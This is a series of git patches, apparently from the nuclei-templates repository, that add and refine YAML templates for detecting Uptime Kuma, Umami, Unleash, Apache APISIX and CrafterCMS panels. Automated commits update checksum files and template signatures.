a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 0f2e2aa252..e3d9398fd9 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3745,4 +3745,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4b0a004830460221008c5613a5a0cf6abacf4895de42c95ec8b316479ea03c21cf335e942cbcf87ccf022100877e480c73ae4cfbba3520153c4792344db60a7b3a44c138faf845db3bd10fdf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c8bddb53fa936be9b6fbc7fd66feb697d5d52aca31e1c86cba815603d6f36b780221008d13bd9355885cd5ce520d970de1599c5380197d0da9109d264f45e61fdc58d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 287f466314f452e388355038dec9a4056dd33d50 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sun, 12 May 2024 08:39:51 +0330 Subject: [PATCH 080/375] Update uptime-kuma-panel tags and reference --- http/exposed-panels/uptime-kuma-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index 2dd78c7795..5d4627e076 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -8,12 +8,12 @@ info: Realtime website and application monitoring tool reference: - https://github.com/louislam/uptime-kuma - - https://uptime.kuma.pet/docs/ + - https://github.com/louislam/uptime-kuma/wiki metadata: max-request: 1 shodan-query: title:"Uptime Kuma" verified: true - tags: uptime,kuma,panel,login + tags: uptime,kuma,panel,login,detect http: - method: GET From 31e936cbfc1455bf27dede4f65e6adc7290d4664 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sun, 12 May 2024 09:14:31 +0330 Subject: [PATCH 081/375] Add description and reference --- http/exposed-panels/umami-panel.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 0384dd6d83..3033077009 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -4,6 +4,11 @@ info: name: Umami Panel - Detect author: userdehghani severity: info + description: | + simple, fast, privacy-focused, open-source analytics solution. + reference: + - https://umami.is/ + - https://umami.is/docs metadata: verified: true max-request: 1 From b6d00d4baf8f300460493bcdc239ef1d2d614cc4 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sun, 12 May 2024 09:43:25 +0330 Subject: [PATCH 082/375] Add unleash-panel.yaml --- http/exposed-panels/unleash-panel.yaml | 34 ++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/unleash-panel.yaml diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml new file mode 100644 index 0000000000..540960bb42 --- /dev/null +++ b/http/exposed-panels/unleash-panel.yaml @@ -0,0 +1,34 @@ +id: unleash-panel + +info: + name: Unleash Panel - Detect + author: userdehghani + severity: info + description: | + Open-source feature management solution built for developers. + reference: + - https://www.getunleash.io/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-3686276641 + tags: panel,unleash,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unleash' + - 'href="https://cdn.getunleash.io/favicon.ico"' + case-insensitive: true + condition: and + + - type: status + status: + - 200 From e3b246ca74b1888c23386230b809c4b8a06e8d9b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 12 May 2024 06:55:29 +0000 Subject: [PATCH 084/375] Auto Generated Templates Checksum [Sun May 12 06:55:29 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5609585042..52b670523d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4447,7 +4447,7 @@ http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b -http/exposed-panels/uptime-kuma-panel.yaml:e1a6b283b6595f63cffa175755728ca7ff9cd3fe +http/exposed-panels/uptime-kuma-panel.yaml:04e1072a63478621b195827aae4d1cbcac5a979d http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc @@ -6685,7 +6685,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:338fb7b684fa9ea824607e7108117bc570d495d7 +http/technologies/favicon-detect.yaml:662ac183c7b67cb50f3b43e94fd9455b9ed79838 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1f0bbdcbed0ef843e234ee52039f0c523ceb65ce +templates-checksum.txt:2cb994188cc69e1f6986e41e711698d0d2d94793 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e92de693030d8dbb4cfe03e646f8b4faf42c0011 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 12 May 2024 06:56:32 +0000 Subject: [PATCH 086/375] Auto Generated Templates Checksum [Sun May 12 06:56:32 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 52b670523d..8db183f14f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4439,7 +4439,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:afab83e5265cf3d604e9153445924e90e87483de +http/exposed-panels/umami-panel.yaml:7761c2f33d703706cbe346443f71098941fdc28a http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2cb994188cc69e1f6986e41e711698d0d2d94793 +templates-checksum.txt:f9756932cbc39cd6a216ea43d495a11798374cff wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4ba8eb1f1f76357b54adebeac93e2fe38f172a2a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 12 May 2024 06:57:15 +0000 Subject: [PATCH 087/375] Auto Template Signing [Sun May 12 06:57:15 UTC 2024] :robot: --- http/exposed-panels/uptime-kuma-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index 5d4627e076..c17bc03bce 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a76857034836e1a9ae14af5352e203fb414f9b8cdb6e26e5cec35bb904d9afb002202568b0be6be509bd7442b6649aecbb7cb453c5e7d7f9726d7b81b4e60baefc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebe940aa6e53fd44bcd7be03b75902f7ce7cb1bfe215dd4723f649ff99e1d778022042ca248ccf5749cc7c89884b88353eff6869ea026ddeec90a7c4d51464b5287c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 90cdaf69e99bc39084a503bd1ab3aa9ba526a7b6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 12:40:51 +0530 Subject: [PATCH 088/375] updated matchers & request --- http/exposed-panels/unleash-panel.yaml | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index 540960bb42..c3378ef0b9 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -10,25 +10,30 @@ info: - https://www.getunleash.io/ metadata: verified: true - max-request: 1 - shodan-query: http.favicon.hash:-3686276641 + max-request: 3 + shodan-query: http.favicon.hash:-608690655 tags: panel,unleash,login,detect http: - method: GET path: - "{{BaseURL}}/login" + - "{{BaseURL}}/sign-in" + - "{{BaseURL}}/favicon.ico" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word part: body words: - - 'Unleash' - - 'href="https://cdn.getunleash.io/favicon.ico"' + - 'Unleash' + - 'content="unleash' + - 'alt="getunleash' + - 'Sign-in - Unleash hosted' case-insensitive: true - condition: and + condition: or - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))" From 330a538faa3cef0fbda67f334dce54a1bf44cb88 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 12:47:39 +0530 Subject: [PATCH 089/375] Update apache-apisix-panel.yaml --- http/exposed-panels/apache/apache-apisix-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 3f3c0b7404..1f8b8afe58 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -1,7 +1,7 @@ id: apache-apisix-panel info: - name: Apache APISIX Login Panel + name: Apache APISIX Login Panel - Detect author: pikpikcu,righettod severity: info description: An Apache APISIX login panel was detected. @@ -9,11 +9,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: - fofa-query: title="Apache APISIX Dashboard" max-request: 1 product: apisix vendor: apache - tags: apache,apisix,panel + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel,login,detect http: - method: GET From 1d4d4fd710adf73fea52d08808168b90cf54c74d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 07:26:01 +0000 Subject: [PATCH 091/375] Auto Generated Templates Checksum [Sun May 12 07:26:01 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8db183f14f..f1c91c699b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3524,7 +3524,7 @@ http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6 -http/exposed-panels/apache/apache-apisix-panel.yaml:157792ae0cf09e97d18b9374f2730846491a2997 +http/exposed-panels/apache/apache-apisix-panel.yaml:54bd9008049427dbffae5fb1bb7408f0cf62fd70 http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585 http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6 http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce @@ -4447,7 +4447,7 @@ http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b -http/exposed-panels/uptime-kuma-panel.yaml:04e1072a63478621b195827aae4d1cbcac5a979d +http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f9756932cbc39cd6a216ea43d495a11798374cff +templates-checksum.txt:b9fba904910651484c880deccdfa2befdfffea23 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fd48612c0c254664cc16e77084a2494580b7d9c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 07:27:51 +0000 Subject: [PATCH 092/375] Auto Template Signing [Sun May 12 07:27:51 UTC 2024] :robot: --- http/exposed-panels/apache/apache-apisix-panel.yaml | 1 + http/exposed-panels/umami-panel.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 1f8b8afe58..d34749989a 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -37,3 +37,4 @@ http: group: 1 regex: - '(?i)Server:\s+APISIX\/([0-9.]+)' +# digest: 490a00463044022077db8164de460b6d9fad9c437f6f20ddff3d1130da4410d3e8fef855a71f69cc02205e85b466ed5fc18cbf90faa089c1beeae3b91c11e43f89454ab0b3eca85e9f73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 3033077009..8f4d13b1de 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -35,4 +35,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" -# digest: 4a0a004730450220172b896da3d6bd42b77029a5548cba1ea8a4852ecadc712d6e3f2a7d6b35dcfd022100886497be5d4a19d2cb6c879e61fbb41280e2c9be3e88233da54f4e621a9a4739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029194c0dffdde61fa306eed121e4193ed634878016007b77b6f7b55c3f9de11102204cddda016f7544b4b498c462c250522872b003cfeb36e329adecf572b1516411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fce870a1dc1b6fdacc3325eb1f8a30c2f034f511 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 13:09:05 +0530 Subject: [PATCH 093/375] updated matchers & request --- http/technologies/craftercms-detect.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index e8ca729dfe..a9de725420 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -17,18 +17,19 @@ info: http: - method: GET path: - - "{{BaseURL}}/studio" + - "{{BaseURL}}" + host-redirects: true + max-redirects: 2 matchers: - - type: dsl - dsl: - - 'status_code == 404' - - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' - condition: and + - type: word + part: header + words: + - 'CrafterCMS' extractors: - type: regex part: body group: 1 regex: - - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' From 524486d9ab2f32e16557f9c6538f4e356170c7d1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 13:16:46 +0530 Subject: [PATCH 094/375] updated matchers --- http/exposed-panels/craftercms-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index 7e78405dd8..a4355eb903 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -23,7 +23,7 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' + - 'contains_any(to_lower(body), "craftercmsnext", "login - craftercms", "crafter software corporation")' condition: and extractors: @@ -31,4 +31,4 @@ http: part: body group: 1 regex: - - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' From a0e9b21cc34776ade7fcd0014df1f08749f1fe86 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:00:00 +0000 Subject: [PATCH 095/375] Auto Generated New Template Addition List [Sun May 12 08:00:00 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 1daa818654..21c320ff36 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,4 @@ http/cves/2024/CVE-2024-0200.yaml +http/exposed-panels/craftercms-panel.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/technologies/craftercms-detect.yaml From a3cabeab3272c5dd13df061470ebf19e2e93ad6f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:00:07 +0000 Subject: [PATCH 096/375] Auto Generated Templates Checksum [Sun May 12 08:00:07 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1c91c699b..d274e4ab32 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3524,7 +3524,7 @@ http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6 -http/exposed-panels/apache/apache-apisix-panel.yaml:54bd9008049427dbffae5fb1bb7408f0cf62fd70 +http/exposed-panels/apache/apache-apisix-panel.yaml:2ea899b548359d2406b8a4576eeca268406a122b http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585 http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6 http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce @@ -4439,7 +4439,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:7761c2f33d703706cbe346443f71098941fdc28a +http/exposed-panels/umami-panel.yaml:325957c13e47f3abedc47f8001c40b08d5626486 http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -6626,6 +6626,7 @@ http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 +http/technologies/craftercms-detect.yaml:967d664464179e29ecb14c10b61345e0dd9b4f77 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94 http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8 @@ -8501,7 +8502,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b9fba904910651484c880deccdfa2befdfffea23 +templates-checksum.txt:f299c16062957a802225717f4a46af046e79322f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3824a4e8858abc5e5bf91a92ddaab726fc16ab18 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:00:48 +0000 Subject: [PATCH 098/375] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cd0572411c..3e4fb89e2b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,7 +4,9 @@ on: paths: - '.new-additions' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/exposed-panels/craftercms-panel.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/technologies/craftercms-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 7e66c054ace5172e180bbb1cd8a18c3e5444ae1c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:00:59 +0000 Subject: [PATCH 099/375] Auto Generated Templates Checksum [Sun May 12 08:00:59 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d274e4ab32..4575afef48 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3693,6 +3693,7 @@ http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e3969 http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 +http/exposed-panels/craftercms-panel.yaml:549ab470d58023ba1996a92b5918a532bb472c8b http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573 http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9 http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996 @@ -5402,6 +5403,7 @@ http/misconfiguration/installer/mcloud-installer.yaml:833e2575e02b6336777860b535 http/misconfiguration/installer/metaview-explorer-installer.yaml:1b9dce3e9610d021aa211b44ed5397207c241be9 http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958ab70b00bcea40bf http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b +http/misconfiguration/installer/moosocial-installer.yaml:02d115a28e24b592b0088b1c0a286c7b2f26161b http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 @@ -8502,7 +8504,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f299c16062957a802225717f4a46af046e79322f +templates-checksum.txt:602a2e89ec9d4a6e063ed5f0b4f4e0a09db2e1be wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b91c52ff8406d70c0e5c902ca36df4f96e7be793 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:01:54 +0000 Subject: [PATCH 100/375] Auto Template Signing [Sun May 12 08:01:54 UTC 2024] :robot: --- http/technologies/craftercms-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index a9de725420..7389a1e9c3 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -33,3 +33,4 @@ http: group: 1 regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' +# digest: 4a0a00473045022100aa4f31503bb26790a17d6e8f9f02499ec52e767847cf7d75e8df780d7d4d211902202c89f6902d7c1b9362db5edc7ee975d910d5c3d99f0911ff0e6d27ba4a57e9cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a330904991789734b32b8db3bedf3f79432cc602 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 12 May 2024 13:32:24 +0530 Subject: [PATCH 101/375] Update tinyproxy-detect.yaml --- http/technologies/tinyproxy-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index df2615fa99..e571cd5694 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -4,7 +4,8 @@ info: name: Tinyproxy - Detect author: bhutch severity: info - description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems + description: | + Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems reference: - 